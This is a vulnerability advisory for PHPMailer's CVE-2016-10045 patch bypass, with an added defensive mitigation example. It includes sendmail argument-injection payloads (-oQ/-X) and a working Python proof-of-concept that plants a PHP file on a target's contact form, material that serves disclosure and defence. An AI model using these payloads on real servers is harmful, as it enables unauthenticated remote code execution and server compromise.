PHPMailer < 5.2.20 Remote Code Execution (0day Patch Bypass/exploit) (CVE-2016-10045)

Source: www.seebug.org, SSV:92591, posted by Root, Dec 29, 2016
EPSS: 0.975 (High), percentile 100.0%

The Chinese version of the analysis: http://paper.seebug.org/164/

BACKGROUND

“PHPMailer continues to be the world’s most popular transport class, with an estimated 9 million users worldwide. Downloads continue at a significant pace daily.”

http://phpmailer.worxware.com/

“Probably the world’s most popular code for sending email from PHP! Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and many more”

https://github.com/PHPMailer/PHPMailer

INTRODUCTION

Independent research uncovered a critical vulnerability in PHPMailer that could be used by (unauthenticated) remote attackers to achieve arbitrary remote code execution in the context of the web server user and remotely compromise the target web application.

To exploit the vulnerability an attacker could target the common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class.

The first patch for the vulnerability CVE-2016-10033 was incomplete. This advisory demonstrates a bypass of that patch. The bypass allows Remote Code Execution on all current versions (including 5.2.19).

NOTE: The vulnerability / patch bypass was responsibly reported to the vendor in private on December 26th, and a new CVE was issued by MITRE on the same day. However, a potential bypass was publicly discussed on the oss-sec list. Holding the advisory back any longer would serve no purpose, which is what triggered its early release.

DESCRIPTION

The patch for the CVE-2016-10033 vulnerability, added in PHPMailer 5.2.17, sanitizes the $Sender variable by applying escapeshellarg() to it before the value is passed to the mail() function.

It does not, however, take into account the clash between escapeshellarg() and the internal escaping that the mail() function performs with escapeshellcmd() on its 5th parameter.

As a result it is possible to inject an extra quote that does not get properly escaped and break out of the escapeshellarg() protection applied by the patch in PHPMailer 5.2.17.

For example:

```php
$mail->SetFrom("\"Attacker' -Param2 -Param3\"@test.com", 'Client Name');
```

will result in the following list of arguments passed to the sendmail program:

```
The Arg no. 0 == [/usr/sbin/sendmail]
The Arg no. 1 == [-t]
The Arg no. 2 == [-i]
The Arg no. 3 == [-f"Attacker\]
The Arg no. 4 == [-Param2]
The Arg no. 5 == [-Param3"@test.com']
```

An attacker could pass the -X parameter of sendmail to write out a log file with arbitrary PHP code.

This makes the current latest 5.2.19 and 5.2.18 versions of PHPMailer vulnerable to Remote Code Execution despite the patch.
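The following is an added example, not code from this advisory or from the PHPMailer project, showing the mitigation pattern the description above implies for application code: a user-supplied address is never allowed to reach the envelope sender (sendmail's -f parameter), and an address containing characters the shell could interpret is rejected outright rather than escaped, since escaping is exactly what the 5.2.17 patch relied on and what the bypass defeats. It assumes PHPMailer 5.2.x loaded through its PHPMailerAutoload.php; the function names isShellSafeAddress() and sendContactMail(), the recipient address and the fixed envelope sender are this example's own, and the form field names follow the PoC's contact form.

```php
<?php
// Added example, not PHPMailer's own code. Assumes PHPMailer 5.2.x is
// available through PHPMailerAutoload.php; the helper names are ours.
require 'PHPMailerAutoload.php';

/**
 * Accept an address only if it is syntactically valid AND contains nothing
 * that /bin/sh could interpret once mail() has applied escapeshellcmd() to
 * the -f parameter. RFC 5321 allows quoted local parts such as
 * "a b"@example.com, so a syntactic check alone can let the advisory's
 * payload shape through; the character check is what actually blocks it.
 */
function isShellSafeAddress($address)
{
    if (!is_string($address) || filter_var($address, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    // Whitespace, quotes, backslashes and shell metacharacters are refused.
    return preg_match('/[\s"\'\\\\`$&|;<>(){}\[\]*?~^!]/', $address) === 0;
}

/**
 * Contact-form handler. $post is the submitted form ('name', 'email', 'msg'
 * as in the PoC's contact form); $envelopeSender is a fixed address set by
 * the operator in configuration and is never taken from the request.
 */
function sendContactMail(array $post, $envelopeSender)
{
    $userAddress = isset($post['email']) ? $post['email'] : '';
    $userName    = isset($post['name'])  ? $post['name']  : '';
    $message     = isset($post['msg'])   ? $post['msg']   : '';

    if (!isShellSafeAddress($userAddress)) {
        // Refuse rather than escape: escapeshellarg() is what the 5.2.17
        // patch relied on and what the bypass defeats.
        error_log('contact form: rejected unsafe sender address');
        return false;
    }

    $mail = new PHPMailer();
    $mail->isMail();   // PHP mail() transport, the code path the advisory describes

    // Envelope sender (sendmail -f) comes from configuration only.
    $mail->setFrom($envelopeSender, 'Contact form');
    $mail->Sender = $envelopeSender;

    // The visitor's address appears only inside message headers,
    // never on the sendmail command line.
    $mail->addReplyTo($userAddress, $userName);
    $mail->addAddress('support@example.com');   // constructed recipient
    $mail->Subject = 'Contact form submission';
    $mail->Body    = $message;

    return $mail->send();   // false on failure; details in $mail->ErrorInfo
}
```

The check is the same whichever MTA provides the sendmail binary, because the risk lies in the command line PHP builds, not in the MTA; a rejected submission is worth logging, since an address containing quotes, spaces or sendmail option strings in a contact form is a strong signal of an exploitation attempt.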

A working PoC is presented below.

PROOF OF CONCEPT EXPLOIT

```python
#!/usr/bin/python

#PHPMailer_RCE_exploit.pl

intro = """
PHPMailer RCE PoC Exploits

PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)

Discovered and Coded by:

 Dawid Golunski
 @dawid_golunski
 https://legalhackers.com

"""
usage = """
Usage:

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt

PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

Disclaimer:
For testing purposes only. Do no harm.

"""

import time
import urllib
import urllib2
import socket
import sys

RW_DIR = "/var/www/html/uploads"

url = 'http://VictimWebServer/contact_form.php' # Set destination URL here

# Choose/uncomment one of the payloads:

# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php  some"@email.com' % RW_DIR

# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php  some\"@email.com" % RW_DIR

######################################

# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"

post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}

# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
```

The researcher also developed an Unauthenticated RCE exploit for a popular open-source application (deployed on the Internet on more than a million servers) as a PoC for real-world exploitation. It might be published after the vendor has fixed the vulnerabilities.

Video PoC:

https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

BUSINESS IMPACT

Successful exploitation could let remote attackers gain access to the target server in the context of the web server account, which could lead to a full compromise of the web application.

SYSTEMS AFFECTED

All current versions of PHPMailer (< 5.2.20) are affected.

Note that exploitation is not limited to systems with the Sendmail MTA.


                                                